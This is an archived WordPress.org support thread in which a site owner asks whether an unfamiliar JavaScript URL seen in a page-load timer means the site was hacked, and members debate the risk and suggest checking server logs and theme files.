WordPress.org

Ready to get started?Download WordPress

Forums

Possible hacker intrusion on my site (29 posts)

  1. LwEEs
    Member
    Posted 6 years ago #

    I was getting some stats using http://www.octagate.com/service/SiteTimer/ when I notice that one of the lines read http://218.5.77.71/beian.js
    Since then I've been trying to locate this .js, what is it? Does anyone know? Is my security compromise? I try to google it and the only thing that comes is some oriental sites. My site is http://www.lumencreativegroup.com, any help will be appreciated.

  2. whooami
    Member
    Posted 6 years ago #

    the javascript loads this page:

    http://211.152.51.87/beian.htm

    Speak Chinese? I dont.

    You havent provided enough info for anyone to "help" you beyond that. In other words, if someone tried to use an include to load that, etc..

    so thats that, there you go.

  3. jessicakoh
    Member
    Posted 6 years ago #

    what version of wordpress are you using?

  4. jessicakoh
    Member
    Posted 6 years ago #

    I tried searching this "http://218.5.77.71/beian.js" in google. It is definitely dangerous.

    I think you may have to clean install your wordpress.

    You can safely back up your post, pages and comments. Those are harmless.

    Once you get the xml backup file, search for "http://218.5.77.71/beian.js"

  5. LwEEs
    Member
    Posted 6 years ago #

    Jessica

    I'm using the latest 2.2.1, I was thinking on moving to PHP5 should I take this opportunity and do the move on a clean install?

    Whooami

    What else would you need to help?

  6. whooami
    Member
    Posted 6 years ago #

    MeneL001, BEFORE you start freaking out and taking advice from ppl, especially ppl that have NO post history, you need to determine WHY the link showed up in your stats.

    To do so, you need to NOT rely on some third party stats site, and instead, look at your server logs. If you have cpanal available theyre accessible from there.

    Its possible, and very likely that it was a simple attempt at an include attack -- and thats NOT necessarily something that requires you to reinstall, backup, yadda yadda yadda.

    In other words, calm down. Get your server logs. and if you need help figuring them out - send them to me @ whoo AT ( YOU NEED TO REMOVE THIS ) village-idiot.org

  7. Root
    Member
    Posted 6 years ago #

    Folk really should not turn up here out of left field proposing a reinstall and all sorts of frightening stuff when they haven't got a clue what they are doing. Good catch - whooami. :)

  8. LwEEs
    Member
    Posted 6 years ago #

    Thanks to all of you, I will check my logs now and report in about 2 hours.

    Thanks again.

    Luis

  9. whooami
    Member
    Posted 6 years ago #

    root,

    it amazes me :)

    http://www.google.com/search?hl=en&q=http%3A%2F%2F218.5.77.71%2Fbeian.js&btnG=Google+Search

    do YOU see anything there? I dont either, so how it's determined to be malicious via THAT google lookup is beyond me..

    Granted, IF it was an attempted include, thats not a good thing by any stretch of the imagination.

    And it may very well be malicious ..

    But.. really.

  10. mrmist
    Forum Janitor
    Posted 6 years ago #

    My guess is that that javascript is probably meant to be some kind of advert. After all, it is designed to open a new browser window, which itself links to a load of other places (none of which I could open at this time, just dead links.)

    Possibly mallicious, but not particuarly harmful in and of itself, unless there is more to it.

  11. IcelandDream
    Member
    Posted 6 years ago #

    Not malicious? If this same dope broke into your house and only stood in the foyer singing show tunes that would be ok? No sir, not invited so is malicious no matter what they appear to be doing.

  12. whooami
    Member
    Posted 6 years ago #

    IcelandDream,

    Get a little perspective. On the surface, neither the js OR the page it opens is malicious.

    Futhermore, we dont even know the context in which it showed up in this individuals logs. It may have simply been a referer, in which case, it nothing more than spam.

    Your metaphor regarding someone breaking into your house is way off base, since so far, there is no evidence of any break in.

    Furthermore, NO-ONE said it was NOT malicious, until me just NOW - and it isnt. Whats been recommended is looking at the Apache logs. The best advice was already given - so there's no sense in flaming an uneeded fire.

  13. LwEEs
    Member
    Posted 6 years ago #

    Ok guys, where exactly do I find the logs?

  14. LwEEs
    Member
    Posted 6 years ago #

    My hosting company is GoDaddy.

  15. whooami
    Member
    Posted 6 years ago #

    MeneL001,

    Do you have cpanel available? I will give you instructions if you do.

  16. LwEEs
    Member
    Posted 6 years ago #

    Sorry, I dont know what cpanel is. Just let me know what to do.

  17. LwEEs
    Member
    Posted 6 years ago #

    Should I open mysql database?

  18. IcelandDream
    Member
    Posted 6 years ago #

    no thanks Who, I don't need examples. Have seen plenty.

    If it was me I would know if this code is expected or not and as such wouldn't be asking about being hacked if it was expected. Therefore it is malicious for the sake of the question being asked. No such thing as harmless code that is uninvited. No different than spam, does no harm but is anything but benign.

  19. LwEEs
    Member
    Posted 6 years ago #

    I'm in mysqladmin.

  20. whooami
    Member
    Posted 6 years ago #

    I have an "experiment" site on godaddy -- as far as I can tell they dont provide a simple way to download your server logs.

    I'm looking through my own "hosting control panel" right now for something that resembles what they talk about here:

    http://help.godaddy.com/article.php?article_id=2372&topic_id=388

  21. whooami
    Member
    Posted 6 years ago #

    NO MeneL001, you are NOT in the right place.

  22. LwEEs
    Member
    Posted 6 years ago #

    ok I'm waiting for instructions.

  23. whooami
    Member
    Posted 6 years ago #

    IcelandDream,

    Thats a crock of crap -- especially given the little information thats been provided. As i ALREADY said -- it may very well have been a referer.

    You must get a LOT of malicious referers then, if you use your logic.

    "not expected"
    "uninvited"

    ---

    Now how about you just chill and let me help this person, and lay off the juice.

  24. LwEEs
    Member
    Posted 6 years ago #

    Man! I think GoDaddy actually charges for the logs, by purchasing Traffic Facts I would get access to those logs. That's not fair.

  25. whooami
    Member
    Posted 6 years ago #

    MeneL001,

    You may need to email godaddy to ask them how to access your logs. Ive located the traffic facts link and mine is empty, and tells me to spend money. Additionally, I see NO "logs" link.

    aha! you noticed that too I see :P

  26. mrmist
    Forum Janitor
    Posted 6 years ago #

    Going back to the OP for a second, it said -

    "when I notice that one of the lines read "

    One of the lines in what? A line on your site or a line on the octagate timer site?

    If it's on the timer site and you don't trust it, then don't use that timer site.

    If it's on your site somewhere, then it's more bothersome, but it would be helpful to know *where* it appears.

  27. LwEEs
    Member
    Posted 6 years ago #

    Is actually on the octagate site, when it gives me the results of my pages loading time it includes with js that I don't know where is coming from. What I don't have is any other wordpress install to see if is something from all installs. I'm worry because I don't want to lose a year of work. I do backups with wp-db-backup but I don't know for how long its been there.

    I will contact GoDaddy and report back.

    Thanks,

    Luis

  28. IcelandDream
    Member
    Posted 6 years ago #

    Whoami, wow. I'll stay away that's for damn sure. 'juice' that's funny and ironic. so bye

    Sorry Mene for not being able to help. But there are enough experts without me ever trying.

  29. whooami
    Member
    Posted 6 years ago #

    Btw, octagate is also showing this ..

    http://www.yceml.net/0240/10492144-1.jpg

    I've looked at your javascript. Ive looked at your CSS. Ive looked at your source code, both in my browser and through several source code viewers, and I see neither that or that .js inside your pages.

    Theres nothing that appears to be hidden, no urlencoded stuff, nothing.

    Now that I understand what you saw, you ought to be looking through your files. I am NOT suggesting that you freak out and reinstall.. just that you take a very close at the content of your files, and that you start with your theme files.

Topic Closed

This topic has been closed to new replies.

About this Topic